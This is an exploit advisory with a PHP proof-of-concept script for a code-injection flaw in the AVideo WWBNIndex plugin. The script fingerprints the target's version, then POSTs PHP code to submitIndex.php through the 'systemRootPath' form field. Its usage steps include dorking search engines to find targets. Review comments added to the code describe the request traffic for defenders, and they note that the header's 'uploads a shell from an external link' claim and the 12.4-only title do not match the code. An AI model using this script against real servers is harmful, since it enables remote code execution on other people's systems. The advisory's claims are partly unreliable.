=============================================================================================================================================
| # Title     : AVideo 12.4 php code injection Vulnerability                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://github.com/WWBN/AVideo/tree/master                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] The following PHP code uploads a shell file from an external link.

[+] Line 114 set your target.

[+] Line 115 set your commands.

[+] save code as poc.php .

[+] Usage : cmd = php poc.php .

[+] PayLoad :

<?php
/**
 * Proof-of-concept client for the AVideo WWBNIndex plugin issue described in
 * the advisory header.
 *
 * What the class puts on the wire (useful when writing detections):
 *   - GET  /index.php                         (version fingerprint)
 *   - GET  /plugin/WWBNIndex/submitIndex.php  (plugin presence probe)
 *   - POST /plugin/WWBNIndex/submitIndex.php  with form field `systemRootPath`
 *
 * NOTE(review): the advisory text speaks of uploading a shell from an external
 * link, but nothing in this class uploads or fetches a file; the only
 * attacker-controlled value it sends is the `systemRootPath` form field.
 * NOTE(review): generatePhpFilterPayload() and isArchPHP() are stubs, so the
 * listing as published sends the PHP text unmodified in that field.
 * NOTE(review): presumably the endpoint uses `systemRootPath` in a server-side
 * include/require; the server code is not shown here, so confirm against the
 * vendor source. A request-supplied value for a root-path setting should be
 * rejected outright, and the plugin endpoint should not be reachable
 * unauthenticated.
 * NOTE(review): the title names 12.4 only, while check() flags every version
 * from 12.4 through 14.2 inclusive.
 */
class indoushka
{
    // Base URL of the instance under test; request paths are appended to it as-is.
    private $target_uri;
    // Text placed into the `systemRootPath` field by exploit().
    private $payload;

    /**
     * Stores the base URL and payload text; performs no validation of either.
     *
     * @param string $target_uri Base URL, without a trailing path.
     * @param string $payload    Payload text used by exploit().
     */
    public function __construct($target_uri, $payload)
    {
        $this->target_uri = $target_uri;
        $this->payload = $payload;
    }

    /**
     * Sends one POST to the WWBNIndex submitIndex.php endpoint with the payload
     * in the `systemRootPath` form field, and prints a notice when the HTTP
     * status is anything other than 200. Returns nothing.
     *
     * Detection hint for defenders: any POST to this path that carries a
     * `systemRootPath` parameter is worth alerting on, since that name looks
     * like a server-side setting rather than client input (assumption, confirm
     * against the vendor source).
     */
    public function exploit()
    {
        // Prepare the payload.
        // isArchPHP() always returns true, so the payload is wrapped in PHP tags
        // verbatim and the system(base64_decode(...)) branch is never taken.
        $php_code = "<?php " . ($this->isArchPHP() ? $this->payload : "system(base64_decode('" . base64_encode($this->payload) . "'));") . " ?>";
        // Stub: returns $php_code unchanged (see generatePhpFilterPayload()).
        $filter_payload = $this->generatePhpFilterPayload($php_code);

        // Send the request (URL-encoded form body with a single field).
        $data = http_build_query(['systemRootPath' => $filter_payload]);
        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);

        // Only a non-200 status is reported; a 200 produces no output here.
        if ($response['code'] !== 200) {
            echo "Server returned " . $response['code'] . ". Successful exploit attempts should not return a response.\n";
        }
    }

    /**
     * Fingerprints the target: reads a version string from /index.php, probes
     * for the plugin endpoint, and compares the version against 12.4..14.2.
     *
     * @return string Human-readable verdict; callers in this file only print it.
     */
    public function check()
    {
        $response = $this->sendRequest('GET', '/index.php');
        // sendRequest() always returns a two-key array, which is never falsy,
        // so this branch is not reached even when the connection fails.
        if (!$response) {
            return 'Failed to connect to the target.';
        }

        if ($response['code'] !== 200) {
            return "Unexpected HTTP response code: " . $response['code'];
        }

        // Two version markers are tried: the visible "Powered by" footer and an
        // HTML comment containing "v:". Both calls write to the same
        // $version_match, so the value used below is whatever the second
        // pattern produced.
        preg_match('/Powered by AVideo ® Platform v([\d.]+)/', $response['body'], $version_match);
        preg_match('/<!--.*?v:([\d.]+).*?-->/m', $response['body'], $version_match);
        if (empty($version_match[1])) {
            return 'Unable to extract AVideo version.';
        }

        $version = $version_match[1];
        // Plugin presence is inferred purely from a 200 on a plain GET.
        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');
        if ($plugin_check['code'] !== 200) {
            return 'Vulnerable plugin WWBNIndex was not detected';
        }

        // Inclusive range: 12.4 <= version <= 14.2 is reported as vulnerable.
        if (version_compare($version, '12.4') >= 0 && version_compare($version, '14.2') <= 0) {
            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";
        }

        return "Detected non-vulnerable AVideo version: {$version}";
    }

    /**
     * Issues one HTTP request with cURL and returns the status code and body.
     *
     * No timeout, redirect, TLS or header options are set, so libcurl defaults
     * apply. When curl_exec() fails, 'body' is false and 'code' is whatever
     * curl_getinfo() reports for the failed transfer.
     *
     * @param string      $method HTTP verb, passed through as a custom request method.
     * @param string      $uri    Path appended to the stored base URL without normalisation.
     * @param string|null $data   Request body; only attached when $method is 'POST'.
     * @return array ['code' => HTTP status, 'body' => response body or false]
     */
    private function sendRequest($method, $uri, $data = null)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);
        // Return the body as a string instead of echoing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }

        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        return ['code' => $http_code, 'body' => $response];
    }

    /**
     * Stub that reports whether the payload is raw PHP code; always true here.
     */
    private function isArchPHP()
    {
        // Assume the payload is PHP code.
        return true; // or check this based on certain conditions
    }

    /**
     * Stub for the payload-encoding step; returns its argument unchanged.
     *
     * NOTE(review): the name suggests a PHP stream-filter encoding was
     * intended, but no such logic is present in this listing.
     */
    private function generatePhpFilterPayload($php_code)
    {
        // Placeholder: the author left the payload-preparation (filter) logic unimplemented.
        return $php_code; // modify this according to your requirements
    }
}

// Usage example. Both values below are the author's placeholders.
// NOTE(review): the verdict from check() is only printed; exploit() is called
// unconditionally afterwards, whatever check() returned.
$target_uri = "http://target-url.com"; // enter the target address here
$payload = "<?php echo 'Hello World!'; ?>"; // the payload to be used
$indoushka = new indoushka($target_uri, $payload);
$check_result = $indoushka->check();
echo $check_result . "\n";
$indoushka->exploit();
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================